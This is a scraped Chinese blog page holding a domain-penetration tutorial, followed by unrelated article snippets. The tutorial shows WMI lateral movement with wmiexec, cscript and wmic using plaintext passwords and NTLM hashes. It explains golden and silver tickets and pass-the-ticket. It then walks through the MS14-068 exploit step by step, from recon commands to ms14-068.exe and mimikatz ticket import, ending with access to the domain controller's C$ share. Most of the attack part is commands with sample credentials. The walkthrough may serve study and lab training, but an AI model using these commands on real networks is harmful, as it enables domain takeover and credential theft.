当前位置: 首页 > news >正文

域渗透AD渗透攻击利用 MS14-068漏洞利用过程 以及域渗透中票据是什么 如何利用

news 2026/5/13 8:06:03

目录

wmi协议远程执行

ptt票据传递使用

命令传递方式

明文口令传递 

hash口令传递

票据分类

kerberos认证的简述流程

PTT攻击的过程

MS14-068 漏洞

执行过程

wmi协议远程执行

  • wmi服务是比smb服务高级一些的,在日志中是找不到痕迹的,但是这个主要是传递的管理员用户凭据.
  • 域横向移动WMI服务利用 cscript、wmiexec、wmic.
  • WMI(Windows Management Instrumentation)是通过135端口进行利用支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹.
  • netstat -ano -p tcp 
  • 遇到这两个端口大概率就是windows系统哟
  • 域内主机执行以下命令 查看域控主机的相关信息类容
    • wmiexec
      • 套件impacket wmiexec明文或hash传递,有回显exe版本,可能被杀.
      • wmiexec.exe XIE0/administrator:"123@qq.com"@192.168.1.89 "whoami"
      • wmiexec.exe  都是一些python文件 只是生成了一些exe文件
      • 这个可以再github上查看pyton源码以及可执行文件.
        • 域hash传递命令
        • wmiexec.exe -hashes :3a3b8e860125a8a182550fe86e7f923f XIE0/administrator@192.168.1.89 "whoami"
    • cscript 有回显
      • 自带cscript明文传递,有回显,需要下载wmiexec.vbs配合,上传到对应域内磁盘文件夹下.
      • cscript //nologo wmiexec.vbs /shell 192.168.1.89 administrator "123@qq.com"
        • 来到域内主机
        • 执行完成后 窗口连接就指向了 域控主机了,但是如果域主机上有杀毒软件,那么就要退出杀毒,再执行. 
    • wmic 无回显
      • wmic /node:192.168.1.89 /user:administrator /password:"123@qq.com" process call create "cmd.exe /c ipconfig >C:\1.txt"
      • 再到域控主机上查看 c盘

ptt票据传递使用

  • 命令传递方式

    • 明文口令传递 
    • hash口令传递
    • 票据分类
      • 票据口令传递-[ptt pass the ticker]
        • 金票{黄金票据} 
        • 银票{白银票据}

涉及到kerberos认证流程 参考 文章哟 !域渗透协议 详解之 : Kerberos 看看就明白是什么玩意了-CSDN博客

  • kerberos认证的简述流程

    • 客户端需要向kdc授予票据 kdc: 秘钥分发中心 也就是可以理解成售票处
      • 黄金票据相当于伪造了一个售票处
    • 拿着授予的票据去访问服务端的服务
      • 伪造了需要访问的服务

PTT攻击的过程

MS14-068 漏洞
执行过程
  • github地址有兴趣可以自行研究一下:
  • https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
  • 漏洞的原理使用的SID的方式进行的
  • 这个漏洞是域提权漏洞,原理就和黄金票据相似,通过生成黄金票据,导入工具中,将一个普通权限的域用户获取域管的使用权限,从而达到控制整个域。

运用过程:

  • 该补丁没有打,猜测存在MS14-068漏洞
  • 收集域信息
    • net time #获取域管账号
    • net config workstation #获取域信息
    • nltest /dsgetdc:moonsec #获取域管信息
       
  1. 执行命令
  • ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址
  • 查询sid
    • whoami /user
  • 上传攻击工具

  • 攻击命令
    • ms14-068.exe -u hack@xie.com -p 123@qq.com -s S-1-5-21-557645019-1356755253-2509318976-500 -d 192.168.1.89
    • 开始执行在win7域内主机上,执行完成后会创建一张TGT的预售票
      • 然后查看这张票下面有那些票。
    • klist 查看票
    • klist purge 清除票

    • 也可以使用 mimikatz.exe 相关命令来处理

    •  上传mimikatz.exe
    • 执行以下命令
    • kerberos::purge #清空票据
    • kerberos::ptc 123.ccache #导入票据
      • mimikatz.exe "kerberos::ptc 123.ccache" "exit"
      • 在域内主机中 查看域控主机c盘的内容
      • 执行net time 获取域控主机名称
        • AD
      •  查看域控主机c盘中含有什么类容
        • dir \\AD.xie.com\c$
    • kerberos::list #查看票据

相关文章:

域渗透AD渗透攻击利用 MS14-068漏洞利用过程 以及域渗透中票据是什么 如何利用

目录 wmi协议远程执行 ptt票据传递使用 命令传递方式 明文口令传递 hash口令传递 票据分类 kerberos认证的简述流程 PTT攻击的过程 MS14-068 漏洞 执行过程 wmi协议远程执行 wmi服务是比smb服务高级一些的,在日志中是找不到痕迹的,但是这个主…...

编程日记 2024/10/25 3:06:26

C++进阶-->继承(inheritance)

1. 继承的概念及定义 1.1 继承的概念 继承(inheritance)机制是面向对象程序设计使代码可以复用的最重要手段,他允许我们在保证原有类的特性基础上还进行扩展,通过继承产生的类叫做派生类(子类),被继承的类叫做基类&a…...

编程日记 2024/10/25 3:04:25

可视化项目 gis 资源复用思路(cesium)

文章目录 可视化项目 gis 资源复用思路底图、模型替换思路具体操作 可视化项目 gis 资源复用思路 背景: A项目的底图、模型 是现在在做的 B项目所需要的,现在要把 B项目的底图之类的替换成 A系统的 底图、模型替换思路 观察可访问系统的 gis 相关网络请…...

编程日记 2024/10/25 3:03:24

SQL实战测试

SQL实战测试 (请写下 SQL 查询语句,不需要展示结果) 表 a DateSalesCustomerRevenue2019/1/1张三A102019/1/5张三A18 1. **用一条 ** SQL 语句写出每个月,每个销售有多少个客户收入多少 输出结果表头为“月”,“销…...

编程日记 2024/10/25 3:00:20

Java 基础教学:基础语法-变量与常量

变量 变量是程序设计中的基本概念,它用于存储信息,这些信息可以在程序执行过程中被读取和修改。 变量的声明 在Java中,声明变量需要指定变量的数据类型以及变量的名称。数据类型定义了变量可以存储的数据种类(例如整数、浮点数…...

编程日记 2024/10/25 2:57:17

vue3使用element-plus手动更改url后is-active和菜单的focus颜色不同步问题

在实习,给了个需求做个新的ui界面,遇到了一个非常烦人的问题 如下,手动修改url时,is-active和focus颜色不同步 虽然可以直接让el-menu-item:focus为白色能解决这个问题,但是我就是想要有颜色哈哈哈,有些执…...

编程日记 2024/10/25 2:56:15

每天五分钟深度学习框架pytorch:从底层实现一元线性回归模型

本文重点 本节课程我们继续搭建一元线性回归模型,不同的是这里我们不使用pytorch框架已经封装好的一些东西,我们做这个目的是为了更加清楚的看到pytorch搭建模型的本质,为了更好的理解,当然实际中我们还是使用pytorch封装好的一些东西,不要重复造轮子。 模型搭建 #定义…...

编程日记 2024/10/25 2:55:14

编辑器加载与AB包加载组合

解释: 这个 ABResMgr 类是一个资源加载管理器,它用于整合 AB包(Asset Bundle)资源加载和 编辑器模式资源加载。通过这个管理器,可以根据开发环境选择资源加载方式,既支持 运行时使用Asset Bundle加载&…...

编程日记 2024/10/25 2:54:13

【c++】vector中的back()函数

nums.back() 是 C 中 std::vector 类的一个成员函数,用于获取数组(向量)中的最后一个元素。以下是一些关于 nums.back() 的详细解释和示例使用: 1. 功能 nums.back() 返回数组 nums 中的最后一个元素。如果数组为空,…...

编程日记 2024/10/25 2:53:12

[分享] SQL在线编辑工具(好用)

在线SQL编写工具(无广告) - 在线SQL编写工具 - Web SQL - SQL在线编辑格式化 - WGCLOUD...

编程日记 2024/10/25 2:52:11

element-ui隐藏表单必填星号

// 必填星号在前显示 去掉 .el-form-item.is-required:not(.is-no-asterisk) > .el-form-item__label:before { content: !important; margin-right: 0px!important; } // 必填星号在结尾显示 .el-form-item.is-required:not(.is-no-asterisk) > .el-form-item__labe…...

编程日记 2024/10/25 2:51:09

自动驾驶系列—激光雷达点云数据在自动驾驶场景中的深度应用

🌟🌟 欢迎来到我的技术小筑,一个专为技术探索者打造的交流空间。在这里,我们不仅分享代码的智慧,还探讨技术的深度与广度。无论您是资深开发者还是技术新手,这里都有一片属于您的天空。让我们在知识的海洋中…...

编程日记 2024/10/25 2:50:06

C#删除dataGridView 选中行

关键在于:从最后一行开始删除。 从前往后删只能删除其中一半,我理解是再remove行的时候dataGridView内部行序列发生了变化,包含在选中行中的特定行会被忽略,从后往前删就可避免这个问题,最后一行的行号影响不到前面的…...

编程日记 2024/10/25 2:48:04

K8S调度不平衡问题分析过程和解决方案

不平衡问题排查 问题描述: 1、业务部署大量pod(据反馈,基本为任务型进程)过程中,k8s node内存使用率表现不均衡,范围从80%到百分之几; 2、单个node内存使用率超过95%,仍未发生pod驱逐,存在node…...

编程日记 2024/10/25 2:47:03

Python中类、继承和方法重写的使用

😀前言 本篇博文将介绍如何定义类、创建类的实例、访问类的成员、使用属性、实现继承及方法重写,希望你能够喜欢 🏠个人主页:晨犀主页 🧑个人简介:大家好,我是晨犀,希望我的文章可以…...

编程日记 2024/10/25 2:44:00

【Neo4j】- 轻松入门图数据库

文章目录 前言-场景一、Neo4j概述二、软件安装部署1.软件下载2.软件部署3.软件使用4.语法学习 总结 前言-场景 这里用大家都了解的关系数据与图数据据库对比着说,更加方便大家理解图数据库的作用 图形数据库和关系数据库均存储信息并表示数据之间的关系。但是,关系…...

编程日记 2024/10/25 2:42:58

LeetCode 206 - 反转链表

解题思路 我们可以使用迭代的方法来实现链表的反转,这里我们先介绍迭代的方法。迭代的思路是:从头节点开始,依次将节点的next指针进行反转,使得当前节点的next指向其前一个节点,然后依次向后移动指针,直至…...

编程日记 2024/10/25 2:40:57

AI生成大片,Movie Gen 可以生成长视频并配上完美的音效,带给观众更好的观看体验。

之前的文章中已经给大家介绍了一些关于长视频生成相关的技术,AI生成大片已经越来越近了。感兴趣的小伙伴可以点击下面链接阅读~ Movie Gen 的工作原理可以简单理解为两个主要部分:一个是生成视频的模型,另一个是生成音频的模型。首先&#x…...

编程日记 2024/10/25 2:39:55

Flink on yarn模式下,JobManager异常退出问题

这个问题排除了很久,其中更换了Flink版本,也更换了Hadoop版本一直无法解决,JobManager跑着跑着就异常退出了。资源管理器上是提示运行结束,运行状态是被Kill掉。 网上搜了一圈,都说内存不足、资源不足,配置…...

编程日记 2024/10/25 2:38:54

面对AI算力需求激增,如何守护数据中心机房安全?

随着人工智能(AI)技术飞速发展,AI算力需求呈现爆发式增长,导致对数据设备电力的需求指数级攀升。这给数据中心带来前所未有的挑战和机遇,从提供稳定的电力供应、优化高密度的部署,到数据安全的隐私保护&…...

编程日记 2024/10/25 2:37:53

OnmyojiAutoScript:阴阳师自动化脚本终极指南,20+日常任务一键托管解放双手

OnmyojiAutoScript:阴阳师自动化脚本终极指南,20日常任务一键托管解放双手 【免费下载链接】OnmyojiAutoScript Onmyoji Auto Script | 阴阳师脚本 项目地址: https://gitcode.com/gh_mirrors/on/OnmyojiAutoScript 还在为阴阳师中重复繁琐的日常…...

编程新知 2026/5/13 7:28:13

基于LLM的智能体驱动文字冒险游戏引擎设计与实现

1. 项目概述:一个AI驱动的文字冒险游戏引擎最近在GitHub上闲逛,发现了一个挺有意思的项目,叫droxey/agentadventure。光看名字,大概能猜到它和“智能体”(Agent)以及“冒险”(Adventure&#xf…...

编程新知 2026/5/13 5:55:50

用STM32CubeMX和HAL库驱动MG90S舵机:从PWM原理到代码实现的保姆级教程

用STM32CubeMX和HAL库驱动MG90S舵机:从PWM原理到代码实现的保姆级教程 第一次接触舵机控制时,我被那个小小的MG90S迷住了——它居然能精确地转动到指定角度!但当我真正开始用STM32控制它时,才发现PWM参数配置的坑比想象中多得多。…...

编程新知 2026/5/13 5:28:15

Factool开源框架:构建可信AI的事实核查自动化流水线

1. 项目概述:从“事实核查”到“可信AI”的基石工具在信息爆炸的时代,我们每天都被海量的文本内容包围——新闻稿、分析报告、产品介绍、学术论文,甚至是AI模型自己生成的回答。一个核心的挑战随之而来:如何快速、准确地判断一段文…...

编程新知 2026/5/13 3:28:53

华为会议转任务AI精准识别整理,省事更清晰,轻松搞定工作落地

"找2026华为会议转任务AI的朋友,你要的精准识别整理、落地工作的真实测评来了。不管你是做学术研究要整访谈、转讲座,还是开会长音频要扒任务,我测了大半个月,直接给你掏实底。我接触太多做学术的朋友,都踩过AI转…...

编程新知 2026/5/13 2:36:38

松下绿色科技战略:技术复用与协同效应如何驱动企业转型

1. 松下困局:消费电子巨头的十字路口2013年初的拉斯维加斯,消费电子展(CES)的喧嚣与霓虹之下,松下的时任社长津贺一宏站在聚光灯前,面对的却是一个冰冷而残酷的现实:公司预计将连续第二年录得高…...

编程新知 2026/5/13 2:30:05

2026设备管理系统选型标准(技术向):8大核心维度,适配信创+全行业场景

对于企业IT运维、采购人员而言,设备管理系统选型需兼顾技术适配、合规要求、落地效率与长期扩展性。本文从技术与实践角度,梳理出8大核心选型标准,重点覆盖独享云部署、Excel导入能力、自定义扩展、信创适配等关键维度,为技术选型…...

编程新知 2026/5/13 1:30:19

FinFET与FD-SOI工艺下的IC可靠性验证关键技术

1. 集成电路可靠性验证的挑战与演进在28nm工艺节点之前,芯片设计工程师面临的选择相对简单——只需沿着摩尔定律的轨迹向下一个工艺节点迁移。但随着FinFET和FD-SOI等新型晶体管结构的出现,以及台积电、三星等代工厂推出的多样化工艺节点选项&#xff0c…...

编程新知 2026/5/13 1:09:12

【仅开放72小时】:Gemini Workspace与Microsoft Entra ID双向同步的密钥轮换脚本(含自动审计日志生成器)

更多请点击: https://intelliparadigm.com 第一章:Gemini Workspace整合方案概述 Gemini Workspace 是 Google 推出的面向企业级 AI 协作的统一平台,其核心价值在于将 Gemini 模型能力深度嵌入办公套件(如 Gmail、Drive、Docs、M…...

编程新知 2026/5/13 0:24:23

Python 爬虫反爬突破:CDN 防护节点穿透采集

前言 当下大型互联网站点、电商平台资讯门户、行业数据网站均全面接入 CDN 内容分发网络,借助全球节点缓存、流量调度、智能分流、节点 IP 隐身、区域访问限制等机制构建底层防护体系。传统爬虫直接请求源站 IP 的方式会被 CDN 节点拦截、跳转、限速、IP 封禁、节点…...

编程新知 2026/5/13 0:10:11